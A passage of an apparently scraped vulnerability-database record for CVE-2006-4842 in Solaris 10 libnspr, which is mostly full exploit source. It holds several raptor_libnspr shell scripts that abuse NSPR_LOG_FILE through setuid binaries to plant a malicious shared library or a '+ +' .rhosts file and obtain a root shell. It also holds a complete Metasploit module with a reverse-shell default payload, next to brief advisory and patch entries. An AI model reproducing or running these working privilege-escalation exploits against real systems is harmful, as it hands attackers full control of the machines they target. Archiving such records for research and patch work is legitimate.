Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme -rw-rw-rw-!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/sbin/lpmove\n#/usr/bin/su\n#/usr/bin/mailq\n\n# prepare the evil shared library\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\necho \" setuid(0);\" >> /tmp/ctors.c\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\necho \"}\" >> /tmp/ctors.c\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\nif [ $? -ne 0 ]; then\n\techo \"problems compiling evil shared library, check your gcc\"\n\texit 1\nfi\n\n# newschool LD_LIBRARY_PATH foo;)\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\nLD_LIBRARY_PATH=/usr/lib/secure su -\n\n# milw0rm.com [2006-10-24]", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:48", "description": "\nSolaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (2)", "edition": 1, "published": "2006-10-16T00:00:00", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-16T00:00:00", "id": "EXPLOITPACK:2A9D47E1F6624AC9BF9BB6A1948A6B9A", "href": "", "sourceData": "#!/bin/sh\n\n#\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\n#\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\n#\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\n#\n# Usage:\n# $ chmod +x raptor_libnspr2\n# $ ./raptor_libnspr2\n# [...]\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\n# # id\n# uid=0(root) gid=0(root)\n# # rm /usr/lib/secure/getuid.so\n# #\n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n#\n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme -rw-rw-rw-!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# prepare the evil shared library\necho \"int getuid(){return 0;}\" > /tmp/getuid.c\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\nif [ $? -ne 0 ]; then\n\techo \"problems compiling evil shared library, check your gcc\"\n\texit 1\nfi\n\n# newschool LD_PRELOAD foo;)\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\n\n# milw0rm.com [2006-10-16]", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:50", "description": "\nSun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)", "edition": 1, "published": "2006-10-24T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EXPLOITPACK:0A06BEDE6DDAF9E385796FE859D61F71", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/20471/info\n \nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\n \nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \n \nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\n\n#!/bin/sh\n\n#\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\n#\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of \n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Yet another newschool version of the local root exploit: this time we place\n# our code in the global constructor (ctors) for the library, as suggested by\n# gera. This way, we don't have to hide a real function and we have a generic\n# library that can be used in all exploits like this. To avoid annoying side-\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\n# a library in the default search path.\n#\n# See also:\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\n#\n# Usage:\n# $ chmod +x raptor_libnspr3\n# $ ./raptor_libnspr3\n# [...]\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\n# # id\n# uid=0(root) gid=1(other)\n# # rm /usr/lib/secure/libldap.so.5\n# #\n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n#\n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme -rw-rw-rw-!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/sbin/lpmove\n#/usr/bin/su\n#/usr/bin/mailq\n\n# prepare the evil shared library\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\necho \" setuid(0);\" >> /tmp/ctors.c\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\necho \"}\" >> /tmp/ctors.c\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\nif [ $? -ne 0 ]; then\n\techo \"problems compiling evil shared library, check your gcc\"\n\texit 1\nfi\n\n# newschool LD_LIBRARY_PATH foo;)\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\nLD_LIBRARY_PATH=/usr/lib/secure su -", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:50", "description": "\nSun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)", "edition": 1, "published": "2006-10-13T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EXPLOITPACK:ABFA17484219E850FDCB9E3C93B96A12", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/20471/info\n\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\n\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \n\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\n\n#!/bin/sh\n\n#\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\n#\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Usage:\n# $ chmod +x raptor_libnspr\n# $ ./raptor_libnspr\n# [...]\n# # id\n# uid=0(root) gid=0(root)\n# # \n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n# \n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/.rhosts\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme rw-rw-rw!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# oldschool rhosts foo;)\necho \"+ +\" > $NSPR_LOG_FILE\nrsh -l root localhost sh -i", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:48", "description": "\nSolaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (1)", "edition": 1, "published": "2006-10-13T00:00:00", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EXPLOITPACK:BF4CC01D6A1DE78B9EEA2F44B218D100", "href": "", "sourceData": "#!/bin/sh\n\n#\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\n#\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# Local exploitation of a design error vulnerability in version 4.6.1 of\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\n# create or overwrite arbitrary files on the system. The problem exists \n# because environment variables are used to create log files. Even when the\n# program is setuid, users can specify a log file that will be created with \n# elevated privileges (CVE-2006-4842).\n#\n# Usage:\n# $ chmod +x raptor_libnspr\n# $ ./raptor_libnspr\n# [...]\n# # id\n# uid=0(root) gid=0(root)\n# # \n#\n# Vulnerable platforms (SPARC):\n# Solaris 10 without patch 119213-10 [tested]\n# \n# Vulnerable platforms (x86):\n# Solaris 10 without patch 119214-10 [untested]\n#\n\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the environment\nNSPR_LOG_MODULES=all:5\nNSPR_LOG_FILE=/.rhosts\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\n\n# gimme rw-rw-rw!\numask 0\n\n# setuid program linked to /usr/lib/mps/libnspr4.so\n/usr/bin/chkey\n\n# other good setuid targets\n#/usr/bin/passwd\n#/usr/bin/lp\n#/usr/bin/cancel\n#/usr/bin/lpset\n#/usr/bin/lpstat\n#/usr/lib/lp/bin/netpr\n#/usr/lib/sendmail\n#/usr/sbin/lpmove\n#/usr/bin/login\n#/usr/bin/su\n#/usr/bin/mailq\n\n# oldschool rhosts foo;)\necho \"+ +\" > $NSPR_LOG_FILE\nrsh -l root localhost sh -i\n\n# milw0rm.com [2006-10-13]", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-4842"], "edition": 1, "description": "## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1)\nSecurity Tracker: 1017050\n[Secunia Advisory ID:22348](https://secuniaresearch.flexerasoftware.com/advisories/22348/)\nOther Advisory URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=418\nKeyword: NSPR\nISS X-Force ID: 29489\nFrSIRT Advisory: ADV-2006-4016\n[CVE-2006-4842](https://vulners.com/cve/CVE-2006-4842)\nBugtraq ID: 20471\n", "modified": "2006-10-11T00:00:00", "published": "2006-10-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:29610", "id": "OSVDB:29610", "title": "Netscape Portable Runtime Arbitrary File Overwrite", "type": "osvdb", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:24", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "description": "**Name**| CVE_2006_4842 \n---|--- \n**CVE**| CVE-2006-4842 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2006-4842: libnspr2 \n**Notes**| CVE Name: CVE-2006-4842 \nVENDOR: Sun \nVersionsAffected: 10 \nRepeatability: unlimited \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4842 \nCVSS: 3.6 \n\n", "edition": 2, "modified": "2006-10-12T00:07:00", "published": "2006-10-12T00:07:00", "id": "CVE_2006_4842", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2006_4842", "type": "canvas", "title": "Immunity Canvas: CVE_2006_4842", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-18T00:42:54", "description": "This module exploits an arbitrary file write vulnerability in the Netscape Portable Runtime library (libnspr) on unpatched Solaris systems prior to Solaris 10u3 which allows users to gain root privileges. libnspr versions prior to 4.6.3 allow users to specify a log file with the `NSPR_LOG_FILE` environment variable. The log file is created with the privileges of the running process, resulting in privilege escalation when used in combination with a SUID executable. This module writes a shared object to the trusted library directory `/usr/lib/secure` and runs the specified SUID binary with the shared object loaded using the `LD_LIBRARY_PATH` environment variable. This module has been tested successfully with libnspr version 4.5.1 on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\n", "published": "2018-09-11T08:11:11", "type": "metasploit", "title": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2019-01-10T19:19:14", "id": "MSF:EXPLOIT/SOLARIS/LOCAL/LIBNSPR_NSPR_LOG_FILE_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Solaris::Priv\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',\n 'Description' => %q{\n This module exploits an arbitrary file write vulnerability in the\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\n prior to Solaris 10u3 which allows users to gain root privileges.\n\n libnspr versions prior to 4.6.3 allow users to specify a log file with\n the `NSPR_LOG_FILE` environment variable. The log file is created with\n the privileges of the running process, resulting in privilege escalation\n when used in combination with a SUID executable.\n\n This module writes a shared object to the trusted library directory\n `/usr/lib/secure` and runs the specified SUID binary with the shared\n object loaded using the `LD_LIBRARY_PATH` environment variable.\n\n This module has been tested successfully with libnspr version 4.5.1\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\n },\n 'References' =>\n [\n ['BID', '20471'],\n ['CVE', '2006-4842'],\n ['EDB', '2543'],\n ['EDB', '2569'],\n ['EDB', '2641'],\n ['URL', 'https://securitytracker.com/id/1017050'],\n ['URL', 'https://securitytracker.com/id/1017051'],\n ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],\n ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],\n ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']\n ],\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'iDefense', # Discovery\n 'Marco Ivaldi', # Exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Oct 11 2006',\n 'Privileged' => true,\n 'Platform' => ['solaris'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\n 'Targets' => [['Auto', {}]],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\n 'WfsDelay' => 10,\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0))\n register_options [\n # Some useful example SUID executables:\n # * /usr/bin/cancel\n # * /usr/bin/chkey\n # * /usr/bin/lp\n # * /usr/bin/lpset\n # * /usr/bin/lpstat\n # * /usr/lib/lp/bin/netpr\n # * /usr/sbin/lpmove\n OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def suid_bin_path\n datastore['SUID_PATH']\n end\n\n def is_writable?(path)\n cmd_exec(\"[ -w #{path} ] && echo true\").include? 'true'\n end\n\n def mkdir(path)\n vprint_status \"Creating directory '#{path}'\"\n cmd_exec \"mkdir -p '#{path}'\"\n register_dir_for_cleanup path\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n register_file_for_cleanup path\n end\n\n def check\n unless setuid? suid_bin_path\n vprint_error \"#{suid_bin_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{suid_bin_path} is setuid\"\n\n unless has_gcc?\n vprint_error 'gcc is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gcc is installed'\n\n # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable\n # Earlier versions may also be vulnerable\n libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'\n libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first\n if libnspr_pkg_version.to_s.eql? ''\n vprint_error 'Could not determine libnspr version'\n return CheckCode::Unknown\n end\n\n if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')\n vprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\"\n\n # Solaris 10 versions prior to the 2006 patches are known to be vulnerable.\n # Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,\n # however third-party software may also introduce a vulnerable version of the library.\n version = kernel_release\n if version.to_s.eql? ''\n vprint_error 'Could not determine Solaris version'\n return CheckCode::Detected\n end\n\n unless Gem::Version.new(version) <= Gem::Version.new('5.10')\n vprint_error \"Solaris version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\n\n # The vulnerability was patched in various Solaris patches for different platforms.\n # For more information, see:\n # - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\n installed_patches = cmd_exec 'showrev -p'\n [\n 119214, # Solaris 10 (x86) patch 119214-10\n 119213, # Solaris 10 (SPARC) patch 119213-10\n 119212, # Solaris 9 (x86) patch 119212-10\n 119211, # Solaris 9 (SPARC) patch 119211-10\n 119209 # Solaris 8 (SPARC) patch 119209-10\n ].each do |patch|\n if installed_patches =~ / #{patch}-(\\d+)/\n revision = $1.to_i\n if revision >= 10\n vprint_error \"Solaris patch #{patch}-#{revision} has been applied\"\n return CheckCode::Safe\n end\n end\n end\n vprint_good 'Solaris patches are not installed'\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless [CheckCode::Detected, CheckCode::Appears].include? check\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n unless is_writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n # Create writable file in /usr/lib/secure\n lib_path = '/usr/lib/secure'\n lib_name = 'libldap.so.5'\n\n vprint_status \"Creating file #{lib_path}/#{lib_name}\"\n cmd_exec 'umask 0'\n cmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\"\n cmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\"\n cmd_exec 'umask 022'\n\n unless is_writable? \"#{lib_path}/#{lib_name}\"\n fail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\"\n end\n\n print_good \"Created file #{lib_path}/#{lib_name}\"\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\n\n # Upload and compile shared object\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\n mkdir base_path\n\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_path}/#{payload_name}\"\n\n so = <<-EOF\n void __attribute__((constructor)) cons() {\n setuid(0);\n setgid(0);\n execle(\"#{payload_path}\", \"\", 0, 0);\n _exit(0);\n }\n EOF\n\n so_name = \".#{rand_text_alphanumeric 5..10}\"\n so_path = \"#{base_path}/#{so_name}\"\n upload_and_compile so_path, so\n\n vprint_status \"Writing shared object #{lib_path}/#{lib_name}\"\n cmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\"\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\n\n # Upload and execute payload\n upload payload_path, generate_payload_exe\n cmd_exec \"chmod +x #{payload_path}\"\n\n print_status 'Executing payload...'\n cmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \"\n end\nend\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb"}], "seebug": [{"lastseen": "2017-11-19T15:58:36", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability (2)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-82336", "id": "SSV:82336", "sourceData": "\n source: http://www.securityfocus.com/bid/20471/info\r\n \r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n \r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n \r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"\r\necho "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c\r\necho " setuid(0);" >> /tmp/ctors.c\r\necho " execle(\\"/bin/ksh\\", \\"ksh\\", 0, 0);" >> /tmp/ctors.c\r\necho "}" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo "problems compiling evil shared library, check your gcc"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n\n ", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82336"}, {"lastseen": "2017-11-19T21:30:36", "description": "CVE-2006-4842\r\n\r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n\r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n\r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue. \n\nSun Solaris 10.0_x86\r\nSun Solaris 10.0\r\nNetscape Portable Runtime API 4.6.1 \n Sun Solaris 10.0\r\n\r\nSun 119213-10\r\n<a href=http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1 target=_blank>http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1</a>\r\n\r\n\r\nSun Solaris 10.0_x86\r\n\r\nSun 119214-10\r\n<a href=http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1 target=_blank>http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1</a>", "published": "2008-08-22T00:00:00", "title": "Sun Solaris 